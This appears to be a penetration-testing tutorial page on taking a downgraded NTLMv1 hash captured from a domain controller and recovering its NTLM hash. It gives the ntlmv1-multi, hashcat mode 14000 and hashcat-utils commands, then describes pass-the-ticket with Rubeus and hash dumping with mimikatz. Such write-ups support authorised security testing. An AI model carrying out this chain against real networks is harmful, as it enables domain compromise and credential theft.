Skip to main content

ntlmv1-multi

As discussed in 7MS #591 (oh and there's also a wonderful guide at crack.sh, this tool is awesome for taking downgraded hashes you can coercer from domain controllers (if the LANMAN settings are set right (well...wrong)) and then eventually crack the NTLM hash to use for passing/impersonating.

Starting at the point where you've captured a downgraded hash:

Use ntlmv1-multi to parse the hash

sudo python3 /opt/ntlmv1-multi/ntlmv1.py --ntlmv1 THE-HASH-YOU-GOT-FROM-RESPONDER

Prep hash for cracking

As a first step, get the hash ready (we recommend doing the cracking somewhere with some horsepower, like vast.ai:

echo "14B8DF571CF877A8:1122334455667788">>14000.hash
echo "7CEAB088CDD16386:1122334455667788">>14000.hash

Crack the hash!

./hashcat -m 14000 -a 3 -1 charsets/DES_full.charset --hex-charset 14000.hash ?1?1?1?1?1?1?1?1

On a vast.ai instance, the DES_full.charset might be actually be in /hashcat/charsets/DES_full.hcchr

The results will look something like this:

14B8DF571CF877A8:1122334455667788:$HEX[STRING1]
7CEAB088CDD16386:1122334455667788:$HEX[STRING2]

Covert DES keys to NTLM keys

In the previous step, the STRING1 and STRING2 values are DES keys and not NTLM keys, so we need to convert them using deskey_to_ntlm.pl which comes with hashcat-utils.

deskey_to_ntlm.pl STRING1
deskey_to_ntlm.pl STRING2

Lets call the output if these operations STRING1NTLM and STRING2NTLM going forward.

On a vast.ai instance, the deskey_to_ntlm.pl might be in /hashcat-utils/src/deskey_to_ntlm

Calculate the last 4 characters of the hash:

./ct3_to_ntlm.bin 8819D23E095B0097 1122334455667788
LAST4

In the example above, the LAST4 represents the output of ./ct3_to_ntlm.bin 8819D23E095B0097 1122334455667788

On a vast.ai instance, the ct3_to_ntlm.bin might be located in ~/hashcat-utils/src

Putting it altogether

Now that you have STRING1NTLM and STRING2NTLM and LAST4, put them altogether to make the NTLM hash of the domain controller!

STRING1NTLMSTRING2NTLMLAST4

Now you can use Rubeus to do an asktgt using the RC4 value (STRING1NTLMSTRING2NTLMLAST4) and then pass it with Rubeus and /ptt, and then use mimikatz to extract important hashes!